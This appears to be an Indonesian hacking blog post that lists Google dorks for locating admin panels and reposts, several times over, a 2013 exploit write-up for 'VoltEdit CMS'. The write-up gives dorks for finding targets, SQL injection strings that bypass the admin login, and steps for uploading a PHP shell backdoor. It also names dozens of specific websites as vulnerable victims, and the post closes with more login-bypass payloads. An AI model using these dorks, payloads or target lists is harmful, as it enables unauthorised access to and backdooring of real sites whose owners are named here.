Hi! It it really nice google dork to bypass the admin panel access. You need to combine with Brain. Good Luck!
"inurl:admin/addproduct.asp"
"inurl:admin/user.asp"
"inurl:admin/addpage.php"
"inurl:admin/gallery.asp"
"inurl:admin/image.asp"
"inurl:admin/adminuser.asp"
"inurl:admin/productadd.asp"
"inurl:admin/addadmin.asp"
"inurl:admin/add_admin.asp"
"inurl:admin/add_admin.php"
"inurl:admin/addnews.asp"
"inurl:admin/addpost"
inurl"inurl:admin/addforum.???"
"inurl:admin/addgame.???"
"inurl:admin/addblog.????"
"inurl:admin/admin_detail.php"
"inurl:admin/admin_area.php"
"inurl:admin/product_add.php"
"inurl:admin/additem.php"
"inurl:admin/addstore.php"
"inurl:admin/add_Products.???"
"inurl:admin/showbook.???"
"inurl:admin/selectitem.???"
"allinurl:admin/addfile.???"
"inurl:admin/addarticle.asp"
"inurl:admin/addfile.asp"
"inurl:admin/upload.php"
"inurl:admin/upload.asp"
"inurl:admin/addstory.php"
"inurl:admin/addshow.php"
"inurl:admin/addmember.asp"
"inurl:admin/addinfo.asp"
"inurl:admin/addcat.asp"
"inurl:admin/cp.asp"
"inurl:admin/productshow.asp"
"inurl:admin/addjob.asp"
"inurl:admin/addjob.???"
"inurl:admin/addpic.???"
"inurl:admin/viewproduct.???"
"inurl:admin/addaccount.php"
"inurl:admin/manage.php"
"inurl:admin/addcontact.???"
"inurl:admin/viewmanager.???"
"inurl:admin/addschool.???"
"inurl:admin/addproject.???"
"inurl:admin/addsale.???"
"inurl:admin/addcompany.???"
"inurl:admin/payment.???"
"inurl:user/emp.???"
"inurl:admin/addmovie.???"
"inurl:admin/addpassword.???"
"inurl:admin/addemployee.???"
"inurl:admin/addcat.???"
"inurl:admin/admin.???"
"inurl:admin/admincp.???"
"inurl:admin/settings.???"
"inurl:admin/addstate.???"
"inurl:admin/addcountry.???"
"inurl:admin/addmedia.???"
"inurl:admin/addcode.???"
"inurl:admin/addlinks.???"
"inurl:admin/addcity.???"
sedikit : cara bisa download di bawah -_-
DOWNLOAD NOW
"inurl:admin/addproduct.asp"
"inurl:admin/user.asp"
"inurl:admin/addpage.php"
"inurl:admin/gallery.asp"
"inurl:admin/image.asp"
"inurl:admin/adminuser.asp"
"inurl:admin/productadd.asp"
"inurl:admin/addadmin.asp"
"inurl:admin/add_admin.asp"
"inurl:admin/add_admin.php"
"inurl:admin/addnews.asp"
"inurl:admin/addpost"
inurl"inurl:admin/addforum.???"
"inurl:admin/addgame.???"
"inurl:admin/addblog.????"
"inurl:admin/admin_detail.php"
"inurl:admin/admin_area.php"
"inurl:admin/product_add.php"
"inurl:admin/additem.php"
"inurl:admin/addstore.php"
"inurl:admin/add_Products.???"
"inurl:admin/showbook.???"
"inurl:admin/selectitem.???"
"allinurl:admin/addfile.???"
"inurl:admin/addarticle.asp"
"inurl:admin/addfile.asp"
"inurl:admin/upload.php"
"inurl:admin/upload.asp"
"inurl:admin/addstory.php"
"inurl:admin/addshow.php"
"inurl:admin/addmember.asp"
"inurl:admin/addinfo.asp"
"inurl:admin/addcat.asp"
"inurl:admin/cp.asp"
"inurl:admin/productshow.asp"
"inurl:admin/addjob.asp"
"inurl:admin/addjob.???"
"inurl:admin/addpic.???"
"inurl:admin/viewproduct.???"
"inurl:admin/addaccount.php"
"inurl:admin/manage.php"
"inurl:admin/addcontact.???"
"inurl:admin/viewmanager.???"
"inurl:admin/addschool.???"
"inurl:admin/addproject.???"
"inurl:admin/addsale.???"
"inurl:admin/addcompany.???"
"inurl:admin/payment.???"
"inurl:user/emp.???"
"inurl:admin/addmovie.???"
"inurl:admin/addpassword.???"
"inurl:admin/addemployee.???"
"inurl:admin/addcat.???"
"inurl:admin/admin.???"
"inurl:admin/admincp.???"
"inurl:admin/settings.???"
"inurl:admin/addstate.???"
"inurl:admin/addcountry.???"
"inurl:admin/addmedia.???"
"inurl:admin/addcode.???"
"inurl:admin/addlinks.???"
"inurl:admin/addcity.???"
sedikit : cara bisa download di bawah -_-
DOWNLOAD NOW
VoltEdit CMS SQL Injection Admin Login Bypass & Shell Upload Vulnerability
================================================== ===============================
=========
VoltEdit CMS SQL Injection Admin Login Bypass & Shell Upload Vulnerability
================================================== ===============================
=========
: ------------------------------------------------- -------------------------------
-------------------------------------------------- ------:
: # Exploit Judul: VoltEdit CMS SQL Injection Admin Login Bypass & Shell Upload Vulnerability
: # Tanggal: 18 Agustus 2013
: # Penulis: X-Cisadane
: # CMS Developer: http://www.ady-voltedge.com/website_development.php
: # Versi: SEMUA
: # Kategori: Aplikasi Web
: # Kerentanan: SQL Injection Admin Login Bypass & Shell Upload Vulnerability
: # Diuji Pada: Versi 26.0.1410.64 m (Windows XP SP 3 32-Bit English)
: # Greetz to: X-Code, Borneo Crew, Depok Cyber, Jelajahi Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club Jabar Cyber, Winda Utari
: ------------------------------------------------- -------------------------------
-------------------------------------------------- ------:
Sebuah beberapa kerentanan telah diidentifikasi dalam "VoltEdit CMS", yang dapat dimanfaatkan oleh penyerang untuk memotong pembatasan keamanan ke
panel admin. masukan login tidak baik dibersihkan di admin.php yang dapat menyebabkan untuk menyertakan beberapa spesial karakter yang digunakan untuk mengubah sintaks SQL jadi kami
dapat memperoleh akses admin. eksploitasi sukses memungkinkan penyerang untuk akses ke fungsi administratif tanpa memerlukan pengetahuan tentang
kata sandi. Sebuah penyerang sementara login sebagai admin, dapat meng-upload PHP Shell (Backdoor) menggunakan fitur dokumen uploader.
Dorks (Bagaimana menemukan target):
================================
intext: cms VoltEdit
inurl: /doing_business_here.php
inurl: /map_room.php
inurl: /colleges_universities.php
Atau menggunakan Google Dorks sendiri :)
Bukti dari konsep
================
[1] SQL Injection Admin Login Bypass
Cari target menggunakan Dorks di atas, misalnya saya gunakan dork ini inurl: /doing_business_here.php
dan mendapat www.russellville.org/doing_business_here.php sasaran
Ubah URL target untuk /admin.php, misalnya www.russellville.org/admin.php
Setelah form login muncul, mengisi ID Login dan Password dengan '= 0 #
Gotcha! Pic: http://i43.tinypic.com/fmtesh.png
[2] Mengunggah Shell / PHP Backdoor
Setelah login dengan Administrator Previllege, Anda dapat meng-upload PHP Shell
Klik menu Dokumen & klik Pilih File
Upload PHP Shell
Pergi ke http: // TARGET / dokumen / Anda Shell.php
Contoh: http://www.russellville.org/documents/botak.php3
Contoh Situs Rentan:
http://www.businessreadywi.com/admin.php
http://www.adyvoltedge.com/index.php
http://www.jcjdc.net/admin.php
http://www.cortlandbusiness.com/admin.php
http://www.morgancoed.com/admin.php
http://www.russellville.org/admin.php
http://drumcountrybusiness.com/admin.php
http://madisoncountyida.com/admin.php
http://chooseeasterniowa.com/admin.php
http://www.putnamcountyindianaeconomicdevelopment.com/admin.php
http://www.foxcitiesregionalpartnership.com/admin.php
http://www.wedobusinesswi.com/admin.php
http://cayuga.adyvoltedge.com/admin.php
http://edwc.org/admin.php
http://www.russellville.org/admin.php
http://www.hancockedc.com/admin.php
http://www.purelansing.com/admin.php
http://www.mcedinc.com/admin.php
http://www.ocedp.com/admin.php
http://scottcountyin.com/admin.php
http://www.putnamcountyindianaeconomicdevelopment.com/admin.php
http://nchcedc.org/admin.php
http://www.jaspercountyin.com/admin.php
http://michiana.adyvoltedge.com/admin.php
http://www.thevalleypartnership.com/admin.php
http://scott.ady-voltedge.com/admin.php
http://highland.ady-voltedge.com/admin.php
dll ...
Dikirim dari smartphone BlackBerry® saya dari Sinyal Bagus XL, Nyambung Teruuusss ...!
Bukti Concept.txt
================================================== ===============================
=========
VoltEdit CMS SQL Injection Admin Login Bypass & Shell Upload Vulnerability
================================================== ===============================
=========
: ------------------------------------------------- -------------------------------
-------------------------------------------------- ------:
: # Exploit Judul: VoltEdit CMS SQL Injection Admin Login Bypass & Shell Upload Vulnerability
: # Tanggal: 18 Agustus 2013
: # Penulis: X-Cisadane
: # CMS Developer: http://www.ady-voltedge.com/website_development.php
: # Versi: SEMUA
: # Kategori: Aplikasi Web
: # Kerentanan: SQL Injection Admin Login Bypass & Shell Upload Vulnerability
: # Diuji Pada: Versi 26.0.1410.64 m (Windows XP SP 3 32-Bit English)
: # Greetz to: X-Code, Borneo Crew, Depok Cyber, Jelajahi Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club Jabar Cyber, Winda Utari
: ------------------------------------------------- -------------------------------
-------------------------------------------------- ------:
Sebuah beberapa kerentanan telah diidentifikasi dalam "VoltEdit CMS", yang dapat dimanfaatkan oleh penyerang untuk memotong pembatasan keamanan ke
panel admin. masukan login tidak baik dibersihkan di admin.php yang dapat menyebabkan untuk menyertakan beberapa spesial karakter yang digunakan untuk mengubah sintaks SQL jadi kami
dapat memperoleh akses admin. eksploitasi sukses memungkinkan penyerang untuk akses ke fungsi administratif tanpa memerlukan pengetahuan tentang
kata sandi. Sebuah penyerang sementara login sebagai admin, dapat meng-upload PHP Shell (Backdoor) menggunakan fitur dokumen uploader.
Dorks (Bagaimana menemukan target):
================================
intext: cms VoltEdit
inurl: /doing_business_here.php
inurl: /map_room.php
inurl: /colleges_universities.php
Atau menggunakan Google Dorks sendiri
Bukti dari konsep
================
[1] SQL Injection Admin Login Bypass
Cari target menggunakan Dorks di atas, misalnya saya gunakan dork ini inurl: /doing_business_here.php
dan mendapat www.russellville.org/doing_business_here.php sasaran
Ubah URL target untuk /admin.php, misalnya www.russellville.org/admin.php
Setelah form login muncul, mengisi ID Login dan Password dengan '= 0 #
Gotcha! Pic: http://i43.tinypic.com/fmtesh.png
[2] Mengunggah Shell / PHP Backdoor
Setelah login dengan Administrator Previllege, Anda dapat meng-upload PHP Shell
Klik menu Dokumen & klik Pilih File
Upload PHP Shell
Pergi ke http: // TARGET / dokumen / Anda Shell.php
Contoh: http://www.russellville.org/documents/botak.php3
Contoh Situs Rentan:
http://www.businessreadywi.com/admin.php
http://www.adyvoltedge.com/index.php
http://www.jcjdc.net/admin.php
http://www.cortlandbusiness.com/admin.php
http://www.morgancoed.com/admin.php
http://www.russellville.org/admin.php
http://drumcountrybusiness.com/admin.php
http://madisoncountyida.com/admin.php
http://chooseeasterniowa.com/admin.php
http://www.putnamcountyindianaeconomicdevelopment.com/admin.php
http://www.foxcitiesregionalpartnership.com/admin.php
http://www.wedobusinesswi.com/admin.php
http://cayuga.adyvoltedge.com/admin.php
http://edwc.org/admin.php
http://www.russellville.org/admin.php
http://www.hancockedc.com/admin.php
http://www.purelansing.com/admin.php
http://www.mcedinc.com/admin.php
http://www.ocedp.com/admin.php
http://scottcountyin.com/admin.php
http://www.putnamcountyindianaeconomicdevelopment.com/admin.php
http://nchcedc.org/admin.php
http://www.jaspercountyin.com/admin.php
http://michiana.adyvoltedge.com/admin.php
http://www.thevalleypartnership.com/admin.php
http://scott.ady-voltedge.com/admin.php
http://highland.ady-voltedge.com/admin.php
dll ...
================================================== ===============================
=========
VoltEdit CMS SQL Injection Admin Login Bypass & Shell Upload Vulnerability
================================================== ===============================
=========
: ------------------------------------------------- -------------------------------
-------------------------------------------------- ------:
: # Exploit Judul: VoltEdit CMS SQL Injection Admin Login Bypass & Shell Upload Vulnerability
: # Tanggal: 18 Agustus 2013
: # Penulis: X-Cisadane
: # CMS Developer: http://www.ady-voltedge.com/website_development.php
: # Versi: SEMUA
: # Kategori: Aplikasi Web
: # Kerentanan: SQL Injection Admin Login Bypass & Shell Upload Vulnerability
: # Diuji Pada: Versi 26.0.1410.64 m (Windows XP SP 3 32-Bit English)
: # Greetz to: X-Code, Borneo Crew, Depok Cyber, Jelajahi Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club Jabar Cyber, Winda Utari
: ------------------------------------------------- -------------------------------
-------------------------------------------------- ------:
Sebuah beberapa kerentanan telah diidentifikasi dalam "VoltEdit CMS", yang dapat dimanfaatkan oleh penyerang untuk memotong pembatasan keamanan ke
panel admin. masukan login tidak baik dibersihkan di admin.php yang dapat menyebabkan untuk menyertakan beberapa spesial karakter yang digunakan untuk mengubah sintaks SQL jadi kami
dapat memperoleh akses admin. eksploitasi sukses memungkinkan penyerang untuk akses ke fungsi administratif tanpa memerlukan pengetahuan tentang
kata sandi. Sebuah penyerang sementara login sebagai admin, dapat meng-upload PHP Shell (Backdoor) menggunakan fitur dokumen uploader.
Dorks (Bagaimana menemukan target):
================================
intext: cms VoltEdit
inurl: /doing_business_here.php
inurl: /map_room.php
inurl: /colleges_universities.php
Atau menggunakan Google Dorks sendiri :)
Bukti dari konsep
================
[1] SQL Injection Admin Login Bypass
Cari target menggunakan Dorks di atas, misalnya saya gunakan dork ini inurl: /doing_business_here.php
dan mendapat www.russellville.org/doing_business_here.php sasaran
Ubah URL target untuk /admin.php, misalnya www.russellville.org/admin.php
Setelah form login muncul, mengisi ID Login dan Password dengan '= 0 #
Gotcha! Pic: http://i43.tinypic.com/fmtesh.png
[2] Mengunggah Shell / PHP Backdoor
Setelah login dengan Administrator Previllege, Anda dapat meng-upload PHP Shell
Klik menu Dokumen & klik Pilih File
Upload PHP Shell
Pergi ke http: // TARGET / dokumen / Anda Shell.php
Contoh: http://www.russellville.org/documents/botak.php3
Contoh Situs Rentan:
http://www.businessreadywi.com/admin.php
http://www.adyvoltedge.com/index.php
http://www.jcjdc.net/admin.php
http://www.cortlandbusiness.com/admin.php
http://www.morgancoed.com/admin.php
http://www.russellville.org/admin.php
http://drumcountrybusiness.com/admin.php
http://madisoncountyida.com/admin.php
http://chooseeasterniowa.com/admin.php
http://www.putnamcountyindianaeconomicdevelopment.com/admin.php
http://www.foxcitiesregionalpartnership.com/admin.php
http://www.wedobusinesswi.com/admin.php
http://cayuga.adyvoltedge.com/admin.php
http://edwc.org/admin.php
http://www.russellville.org/admin.php
http://www.hancockedc.com/admin.php
http://www.purelansing.com/admin.php
http://www.mcedinc.com/admin.php
http://www.ocedp.com/admin.php
http://scottcountyin.com/admin.php
http://www.putnamcountyindianaeconomicdevelopment.com/admin.php
http://nchcedc.org/admin.php
http://www.jaspercountyin.com/admin.php
http://michiana.adyvoltedge.com/admin.php
http://www.thevalleypartnership.com/admin.php
http://scott.ady-voltedge.com/admin.php
http://highland.ady-voltedge.com/admin.php
dll ...
Dikirim dari smartphone BlackBerry® saya dari Sinyal Bagus XL, Nyambung Teruuusss ...!
Bukti Concept.txt
================================================== ===============================
=========
VoltEdit CMS SQL Injection Admin Login Bypass & Shell Upload Vulnerability
================================================== ===============================
=========
: ------------------------------------------------- -------------------------------
-------------------------------------------------- ------:
: # Exploit Judul: VoltEdit CMS SQL Injection Admin Login Bypass & Shell Upload Vulnerability
: # Tanggal: 18 Agustus 2013
: # Penulis: X-Cisadane
: # CMS Developer: http://www.ady-voltedge.com/website_development.php
: # Versi: SEMUA
: # Kategori: Aplikasi Web
: # Kerentanan: SQL Injection Admin Login Bypass & Shell Upload Vulnerability
: # Diuji Pada: Versi 26.0.1410.64 m (Windows XP SP 3 32-Bit English)
: # Greetz to: X-Code, Borneo Crew, Depok Cyber, Jelajahi Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club Jabar Cyber, Winda Utari
: ------------------------------------------------- -------------------------------
-------------------------------------------------- ------:
Sebuah beberapa kerentanan telah diidentifikasi dalam "VoltEdit CMS", yang dapat dimanfaatkan oleh penyerang untuk memotong pembatasan keamanan ke
panel admin. masukan login tidak baik dibersihkan di admin.php yang dapat menyebabkan untuk menyertakan beberapa spesial karakter yang digunakan untuk mengubah sintaks SQL jadi kami
dapat memperoleh akses admin. eksploitasi sukses memungkinkan penyerang untuk akses ke fungsi administratif tanpa memerlukan pengetahuan tentang
kata sandi. Sebuah penyerang sementara login sebagai admin, dapat meng-upload PHP Shell (Backdoor) menggunakan fitur dokumen uploader.
Dorks (Bagaimana menemukan target):
================================
intext: cms VoltEdit
inurl: /doing_business_here.php
inurl: /map_room.php
inurl: /colleges_universities.php
Atau menggunakan Google Dorks sendiri
Bukti dari konsep
================
[1] SQL Injection Admin Login Bypass
Cari target menggunakan Dorks di atas, misalnya saya gunakan dork ini inurl: /doing_business_here.php
dan mendapat www.russellville.org/doing_business_here.php sasaran
Ubah URL target untuk /admin.php, misalnya www.russellville.org/admin.php
Setelah form login muncul, mengisi ID Login dan Password dengan '= 0 #
Gotcha! Pic: http://i43.tinypic.com/fmtesh.png
[2] Mengunggah Shell / PHP Backdoor
Setelah login dengan Administrator Previllege, Anda dapat meng-upload PHP Shell
Klik menu Dokumen & klik Pilih File
Upload PHP Shell
Pergi ke http: // TARGET / dokumen / Anda Shell.php
Contoh: http://www.russellville.org/documents/botak.php3
Contoh Situs Rentan:
http://www.businessreadywi.com/admin.php
http://www.adyvoltedge.com/index.php
http://www.jcjdc.net/admin.php
http://www.cortlandbusiness.com/admin.php
http://www.morgancoed.com/admin.php
http://www.russellville.org/admin.php
http://drumcountrybusiness.com/admin.php
http://madisoncountyida.com/admin.php
http://chooseeasterniowa.com/admin.php
http://www.putnamcountyindianaeconomicdevelopment.com/admin.php
http://www.foxcitiesregionalpartnership.com/admin.php
http://www.wedobusinesswi.com/admin.php
http://cayuga.adyvoltedge.com/admin.php
http://edwc.org/admin.php
http://www.russellville.org/admin.php
http://www.hancockedc.com/admin.php
http://www.purelansing.com/admin.php
http://www.mcedinc.com/admin.php
http://www.ocedp.com/admin.php
http://scottcountyin.com/admin.php
http://www.putnamcountyindianaeconomicdevelopment.com/admin.php
http://nchcedc.org/admin.php
http://www.jaspercountyin.com/admin.php
http://michiana.adyvoltedge.com/admin.php
http://www.thevalleypartnership.com/admin.php
http://scott.ady-voltedge.com/admin.php
http://highland.ady-voltedge.com/admin.php
dll ...
User: 1'or'1'='1
Password: 1'or'1'='1
User: '=' 'or'
Password: '=' 'or'
Sumber : http://www.75n1.net/2016/03/admin-panel-access-bypass-google-dork.html
Password: 1'or'1'='1
User: '=' 'or'
Password: '=' 'or'
Sumber : http://www.75n1.net/2016/03/admin-panel-access-bypass-google-dork.html
0 comments:
Post a Comment